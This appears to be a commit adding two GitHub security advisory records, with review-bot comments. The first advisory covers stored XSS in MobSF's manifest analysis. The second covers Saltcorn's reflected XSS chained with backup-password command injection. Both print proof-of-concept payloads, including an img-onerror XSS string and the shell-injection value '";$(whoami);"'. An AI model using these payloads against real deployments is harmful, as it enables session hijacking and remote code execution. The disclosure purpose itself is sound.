
Commit 112c734

1 parent 46f18f7 commit 112c734

2 files changed

Lines changed: 133 additions & 0 deletions

Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8hf7-h89p-3pqj",
4+
"modified": "2026-01-26T23:36:19Z",
5+
"published": "2026-01-26T23:36:19Z",
6+
"aliases": [
7+
"CVE-2026-24490"
8+
],
9+
"summary": "MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field",
10+
"details": "### Summary\nA Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session by uploading a malicious APK. The `android:host` attribute from `<data android:scheme=\"android_secret_code\">` elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.\n\n### Details\nWhen MobSF analyzes an Android APK containing a `<data>` element with `android:scheme=\"android_secret_code\"`, it extracts the `android:host` attribute and inserts it directly into the analysis report without HTML escaping.\n\n### Vulnerable Code Path\n\n**1. Data Extraction** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 776):\n```python\nxmlhost = data.getAttribute(f'{ns}:host')\nret_list.append(('dialer_code_found', (xmlhost,), ()))\n```\n\n**2. Template String Formatting** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 806):\n```python\n'title': a_template['title'] % t_name, # XSS payload inserted here unescaped\n```\n\n**3. Template Definition** - `mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py` (line 200):\n```python\n'dialer_code_found': {\n 'title': 'Dailer Code: %s Found <br>[android:scheme=\\\"android_secret_code\\\"]',\n ...\n}\n```\n\n**4. 
Unsafe Rendering** - `mobsf/templates/static_analysis/android_binary_analysis.html` (line 1143):\n```html\n{{item|key:\"title\" | safe}}\n```\n\nThe `|safe` Django template filter bypasses auto-escaping, allowing the unescaped `android:host` value to be rendered as raw HTML.\n\n### PoC\n\n### Step 1: Create Malicious APK\n\nCreate an APK with the following `AndroidManifest.xml`:\n\n```xml\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.poc.xsstest\"\n android:versionCode=\"1\"\n android:versionName=\"1.0\">\n\n <application android:label=\"XSS PoC Test\">\n <receiver android:name=\".SecretCodeReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"android.provider.Telephony.SECRET_CODE\"/>\n <data android:scheme=\"android_secret_code\"\n android:host=\"&lt;img src=x onerror=alert(document.domain)&gt;\"/>\n </intent-filter>\n </receiver>\n </application>\n</manifest>\n```\n\n### Step 2: Build the APK\n\nUse apktool or Android build tools to create a valid APK with this manifest.\n\n### Step 3: Upload to MobSF\n\nUpload the malicious APK to MobSF for static analysis.\n\n### Step 4: Trigger XSS\n\nView the static analysis report in a browser. The JavaScript payload executes automatically.\n\n### Confirmed HTML Output\n\n```html\n<td>\nDailer Code: <img src=x onerror=alert(document.domain)> Found <br>[android:scheme=\"android_secret_code\"]\n</td>\n```\n\n### PoC APK Details\n\n| Field | Value |\n|-------|-------|\n| **Filename** | `POC_XSS_APK.apk ` |\n| **MD5 Hash** | `647258656ed03a7e6a0f2acce4ec6a5b` |\n| **Location** | https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk |\n\n### Impact\n\nThis is a **Stored Cross-site Scripting (XSS)** vulnerability affecting all MobSF users who analyze the results of the malicious APK file.\n\n### Attack Scenario\n\n1. Attacker crafts a malicious APK with XSS payload in the manifest\n2. 
Attacker submits APK to a shared MobSF instance or private mobsf instance. \n3. When any user views the analysis report, the XSS payload executes in their browser\n\n<img width=\"1435\" height=\"675\" alt=\"Screenshot 2026-01-15 at 12 24 29 AM\" src=\"https://github.com/user-attachments/assets/e282a0b2-236e-4199-a7ce-b96017cc7052\" />\n\n\nTested in MobSF Public Instance as well.\nhttps://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/ \n\n\n<img width=\"1440\" height=\"780\" alt=\"Screenshot 2026-01-15 at 12 24 57 AM\" src=\"https://github.com/user-attachments/assets/8673b76a-954a-45e7-833a-a64e0a972f2e\" />",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mobsf"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.4.5"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8hf7-h89p-3pqj"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/2b08dd050e7685ee2a14fdbb454affab94129eae"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.5"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-79"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-01-26T23:36:19Z",
63+
"nvd_published_at": null
64+
}
65+
}
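Review bot: the CVSS vector recorded here (`AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N`) claims high privileges are required, but the attack scenario in `details` needs only the ability to upload an APK to a shared instance, and the same text reports the payload firing on the public mobsf.live instance; PR:H should either be justified (e.g. upload requires an admin account in the affected configuration) or lowered so the score matches the scenario. The root cause as quoted is also broader than the summary suggests: `'title': a_template['title'] % t_name` formats every manifest finding and the template renders each one with `{{item|key:"title" | safe}}`, so the `android:host` of the dialer code is one instance of a general unescaped-value pattern; the record would be stronger if it stated whether the referenced fix commit escapes `t_name` at the formatting step (or drops `|safe`) rather than sanitising this single field. Minor: the PoC table value `POC_XSS_APK.apk ` carries a trailing space inside the backticks.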
Lines changed: 68 additions & 0 deletions
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cr3w-cw5w-h3fj",
4+
"modified": "2026-01-26T23:34:49Z",
5+
"published": "2026-01-26T23:34:49Z",
6+
"aliases": [],
7+
"summary": "Saltcorn's Reflected XSS and Command Injection vulnerabilities can be chained for 1-click-RCE",
8+
"details": "### Summary\n1. There is a reflected XSS vulnerability in the GET /admin/edit-codepage/:name route through the name parameter. This can be used to hijack the session of an admin if they click a specially crafted link.\n2. Additionally, there is a Command Injection vulnerability in GET /admin/backup. The admin can inject a shell command in the backup password which is inserted in the command used to create the backup zip.\n\n\nBoth vulnerabilities can be chained to craft a malicious link which will execute an arbitrary shell command on the server if it is clicked by a saltcorn admin with an active session. I believe iframes could also be used to exploit this silently when the admin visits an attacker-controlled web page (though I have not tested that).\n\n### Details\n1. The XSS vulnerability is here: https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/server/routes/admin.js#L4886-L4887 Specifically, the name parameter is inserted into the pages breadcrumbs without sanitization.\n2. The Command Injection happens here: https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/saltcorn-admin-models/models/backup.ts#L381-L382\n\n### PoC\n1. A minimal PoC for the XSS can be as simple as: http://localhost:3000/admin/edit-codepage/%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E%0A (assuming saltcorn running at localhost:3000 and the user having an active admin session)\n2. For the Command Injection, visit the backup section of saltcorn, set an admin password like `\";$(whoami);\"` (including the quotation marks) and then click \"Download a backup\" in the \"Manual backup\" section. 
This should display an error page saying that /bin/sh could not find the binary named \"root\" or \"saltcorn\", depending on the user.\n\nAn example of an exploit that chains both vulnerabilities and generates the aforementioned malicious link:\n[exploit.zip](https://github.com/user-attachments/files/24356819/exploit.zip)\n\n### Affected Versions\nEdit: The following Docker containers from docker hub were tested: 1.4.1, 1.4.0, 1.3.1, 1.3.0, 1.2.0, 1.1.2, 1.1.1, 1.0.0\nThe Command Injection is applicable to versions >= 1.3.0.\nThe XSS is applicable to versions >= 1.1.1",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "@saltcorn/server"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "1.1.1"
27+
},
28+
{
29+
"fixed": "1.5.0-beta.19"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-cr3w-cw5w-h3fj"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/saltcorn/saltcorn/commit/1bf681e08c45719a52afcf3506fb5ec59f4974d5"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/saltcorn/saltcorn"
48+
},
49+
{
50+
"type": "WEB",
51+
"url": "https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/saltcorn-admin-models/models/backup.ts#L381-L382"
52+
},
53+
{
54+
"type": "WEB",
55+
"url": "https://github.com/saltcorn/saltcorn/blob/020893c0001678fd5ebd2c088ba68b395de1aabc/packages/server/routes/admin.js#L4886-L4887"
56+
}
57+
],
58+
"database_specific": {
59+
"cwe_ids": [
60+
"CWE-77",
61+
"CWE-79"
62+
],
63+
"severity": "CRITICAL",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-01-26T23:34:49Z",
66+
"nvd_published_at": null
67+
}
68+
}
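Review bot: the `affected` entry lists only `@saltcorn/server`, yet the command-injection sink cited in `details` and in `references` is `packages/saltcorn-admin-models/models/backup.ts`, a different package in the monorepo; if that package is published separately it should also be listed as affected, otherwise consumers matching on package name will miss the backup-password injection. The single range `introduced 1.1.1` / `fixed 1.5.0-beta.19` merges two bugs with different starting points (`details` says the XSS applies from 1.1.1 and the command injection from 1.3.0) and names a pre-release as the first fixed version, so anyone pinned to stable 1.4.x has no patched stable release recorded here; consider splitting the ranges or adding a stable fixed version once one exists. `aliases` is empty, so no CVE is linked for a chain rated CRITICAL.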
